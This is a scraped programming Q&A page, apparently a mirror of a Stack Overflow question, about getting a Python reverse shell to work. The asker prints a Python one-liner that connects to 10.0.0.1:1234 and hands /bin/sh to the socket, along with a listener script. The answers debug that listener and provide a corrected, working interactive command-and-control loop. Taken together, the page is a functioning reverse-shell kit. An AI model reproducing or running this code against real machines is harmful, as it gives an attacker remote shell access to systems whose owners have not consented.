stackoom
  简体   繁体   中英

bash shell and python server to send commands

 原文  2022-01-08 21:58:23       python/ sockets/ netcat/ reverse-shell

Question

I had a doubt regarding one of my reverse shell I tried locally:

After trying manually the steps to get an interactive shell with the following reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

_

I tried to do a python server that would automate this:

# coding: utf-8

import socket

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.bind(('', 1234))
socket.listen(1)
client, address = socket.accept()
print "{} connected".format( address )

while True:
        print(client.recv(2048)) # this showed me I had a shell
        client.send(input("").encode('utf-8'))

client.close()
stock.close()

Can someone figure out why my commands are not executed but the shell is launched (client side)?

Thanks.

2 answers

solution1
 0  2022-01-08 22:46:57

    client.send(input("").encode('utf-8'))

input will strip the newline from the input it read. The shell though is expecting a command to end with a newline. The fix is thus to add the missing newline:

    client.send(input("").encode('utf-8') + b"\n")

solution2
 0  2022-01-08 22:49:29

  • First, the variable names should not be the same as the library names.
  • The server first expects some data, but there is no data to come. That's why the problem occurs.
  • Since you are connecting directly to the shell, you must use a newline specifier, ie '\n' every time data is sent
  • Each time data is sent, you have to wait a little while to fetch the data. If you don't wait, there will be a problem because you are trying to pull the data before the code is run on the other side.
  • You need to decode the incoming data
  • Closing the client and socket will not work. Because it will never exit the while loop and the codes below will not work. You can do a check for output for that. For example, when you type 'exit', the loop will end.

The code should be at least like this:

import socket
import time

def interact(client):
    command=''
    while(command != 'exit'):
        command=input('$ ')
        client.send((command + '\n').encode('utf-8'))
        time.sleep(0.5)
        print client.recv(2048).decode('utf-8')
    client.close()
    return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 1234))
s.listen(1)
client, addr = s.accept()
print "{} connected".format( addr )
interact(client)

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Use Jython Subprocess to send commands to bash shell Replicate shell environment in python for executing bash commands Send commands to an interactive shell from Python Python-how to send commands to existing shell? How to send a Python Variable to shell commands? Executing Git server commands through Python shell running series of interactive shell commands in bash/python/perl script Wrap all commands entered within a Bash-Shell with a Python script How to implement threading to run two bash shell commands in python? bash shell commands run through python to be universal with windows, mac, and linux
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM